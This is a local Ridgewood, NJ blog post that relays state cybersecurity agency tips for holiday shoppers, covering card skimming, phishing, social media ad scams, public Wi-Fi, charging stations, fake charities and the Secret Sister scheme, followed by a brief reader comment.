the staff of the Ridgewood blog and the DHS
Ridgewood NJ, during the 2022 holiday season, consumers spent approximately $936.3 billion, an increase of over five percent from the previous year. Online and other non-store shopping increased 9.5 percent, totaling $261.6 billion. On Cyber Monday alone, consumers spent a record $11.3 billion. This year, total sales are expected to moderately increase about three percent given the rising costs of goods and services due to inflation and other factors, and consumers may choose to spread out their holiday shopping over a longer period of time – in 2022, 49 percent of consumers started their holiday shopping before November. While predictions for total sales are debated, one thing is certain – cybercriminals will continue their efforts to target online shoppers and marketplaces for financial gain. As consumers may be increasingly motivated to find deals, specials, and discounts when purchasing gifts this year in particular, it is vital to maintain awareness of the many cyber threats posed by these individuals and groups. Threat actors may target victims through a variety of methods, including compromised or spoofed websites, phishing campaigns, social media ads and messages, or unsecured Wi-Fi networks. Reviewing the common attack vectors detailed in this article, along with tips and best practices, will help to combat the threats posed by cybercriminals this holiday season.
Use Payments With Greater Consumer Protections
Magecart attacks are a type of web-based data skimming operation used to capture customer payment card data from the checkout pages of online stores. These attacks are accomplished by gaining access to the targeted website (either directly or through a supply chain attack), injecting malicious JavaScript code into the checkout page to skim the desired data, and sending the information back to a threat actor-controlled server. Magecart attacks are conducted by many threat actors and are not specific to one group. Once payment card data is stolen, it can be used by the threat actors to make fraudulent purchases or sold in dark web or other marketplaces. Cybercriminals are likely continue to target online marketplaces this year. As such, online shoppers are encouraged to use credit cards over debit cards as they often have better consumer fraud protections. Some banks also offer merchant-specific “virtual cards” that can be used in lieu of the customers actual payment card number. Additionally, consider enabling charge notifications for every card transaction, where available. Enabling these notifications may make it easier for a customer to identify a fraudulent transaction as soon as it occurs. If a customer discovers fraudulent activity on their account, lock the affected card where this option is available, notify the banking institution immediately, and request a new payment card.
Be Wary of Suspicious Emails That Appear Sent From Known Entities or Contacts
Around the holidays, users are likely to receive emails from known retailers regarding sales and coupons, order confirmations, and shipping notices. Cybercriminals can create spoofed emails by stealing retailer branding to make fraudulent emails appear legitimate, and may contain links or attachments that install malware or lead recipients to spoofed websites that steal user credentials. These emails may attempt to convey a sense of urgency – “Limited Time Offer!” – to prevent users from thoroughly inspecting the email for red flags. Recently, the NJCCIC has observed Amazon, American Express, and FedEx phishing emails attempting to deliver to New Jersey state employees in order to steal users’ credentials. Users are advised to navigate directly to retailer websites by typing the legitimate URL into their browser instead of clicking on links in emails, and refrain from entering login credentials on websites visited via links delivered in emails.
Additionally, individuals may receive an email that appears to be sent from a known contact within their organization asking for a “favor.” These messages often inquire if the recipient is available and then asks for them to purchase gift cards on their behalf with the promise to refund them. These emails use display name spoofing to make them appear to come from a known contact and may use formatting to suggest the email is a reply to a previous email thread in an attempt to appear legitimate. The sender will likely frame the request as being related to holiday gifts or donations and instruct the recipient to send them the codes on the back of the gift cards after purchase. These requests may raise less suspicion during the holiday season and could result in a greater rate of victimization.
Take Caution with Social Media Ads
Users are often faced with ads as they scroll social media platforms. While many of these ads link to known, legitimate vendor websites, users may also be confronted with ads that link to malicious or otherwise suspicious sites that could be used to install malware, steal credentials, or sell counterfeit goods. URL shortening can be employed by cybercriminals to trick users on social media sites and other outlets by hiding the true destination of a link. Users are advised to use a URL expander to reveal the true destination of shortened URLs prior to visiting websites and verify websites are the legitimate vendor prior to making any purchases.
Look Out for Holiday-Themed eCards and Messages Meant to Install Malware
In the past, users reported being targeted with various Thanksgiving Day-related scams. In some cases, spoofed emails were sent appearing to originate from legitimate organizations and contained the subject line “Thanksgiving eCard.” Additionally, an Emotet banking trojan campaign was observed using Thanksgiving lures, such as the subject lines “Happy Thanksgiving Day Greeting Message” and “Thanksgiving Day Card.” As malicious actors commonly leverage public interest and current events to conduct financial fraud and disseminate malware, users are reminded to exercise caution with unexpected or unsolicited emails, especially those with a holiday theme.
Do Your Online Shopping at Home
Avoid using public computers, such as those at a library or hotel, or public Wi-Fi connections to log in to personal accounts or conduct online shopping. Public computers could be infected with malware designed to steal your information and hackers can intercept network traffic traveling over unencrypted Wi-Fi signals. If you must connect to public Wi-Fi, use a virtual private network (VPN) to secure information transmitted between your device and the internet. Additionally, users are advised to refrain from using work computers to make online purchases as cyber threats could endanger company and/or customer information. For information on how to secure your home network, review the NJCCIC guide “Configuring & Securing a Home Wi-Fi Router.”
Enable Multi-Factor Authentication on All Accounts
Be sure to enable multi-factor authentication (MFA) – authentication by combining at least two of the following: something you know, something you have, and something you are – on every account that offers it, as this will greatly reduce the risk of account compromise via credential theft. Even if a cybercriminal obtains a user’s username and password, they will be unable to access that user’s account without their second factor. The NJCCIC encourages users to choose authentication apps, hardware tokens, or biometrics as a second factor over SMS-based authentication due to the risk of SIM-swapping and other MFA bypass techniques, though using any form of MFA is beneficial.
Avoid Connecting Devices to Public Charging Stations
Public charging stations supplied with power cables or USB ports located in stores, airports, libraries, and schools may seem like a convenient way to charge your mobile devices on-the-go, but can you be sure that your device and data will be safe if you connect? These kiosks can contain concealed computers that attempt to extract data such as contact information, photos, and videos from connected devices, unbeknownst to the users. Additionally, malicious or compromised charging stations can expose devices to the risk of a malware infection. Even if the charging station is not malicious, the manufacturer or owner of the kiosk may require users to input their email addresses or phone numbers in order to charge their devices, potentially exposing them to unwanted marketing campaigns, phishing emails, and scam calls.
Verify Charities Before Donating
It is common around the holidays to donate to charities, particularly those that provide goods and/or services to those individuals and families in need. Users may be prompted to donate via solicitations received through email or social media; however, these could be promoting fake charities or impersonating legitimate charities. Prior to donating, research the charity through a nonprofit site such as charitywatch.org or charitynavigator.org for information on charity legitimacy and other details, such as the percentage of donations that go directly to the associated cause. The Federal Trade Commission (FTC) offers guidance in their ‘How to Donate Wisely and Avoid Charity Scams’ post.
Beware of ‘Secret Sister’ Gift Exchange Scam
Many people enjoy participating in group gift exchanges this time of year; however, beware of potential scams. Social media posts promoting a “Secret Sister” gift exchange promise between 6 and 36 gifts in exchange for sending one gift. While this type of chain-letter appears innocent, it is actually illegal and considered a pyramid scheme. The scam, detailed by the Better Business Bureau, begins by requesting the name and address of the recipient and their friends. This holiday season, only participate in gift exchanges with individuals you know personally and refrain from sharing too much personal information online.
We hope everyone has a happy and healthy holiday season!
If you experience a cyber-related incident, you may report it to the NJCCIC via the Cyber Incident Report form. All other scams can be reported to the FTC via their website.
Heck yes! I don’t even answer calls if they are from a number I don’t know. Old school thinking but it works!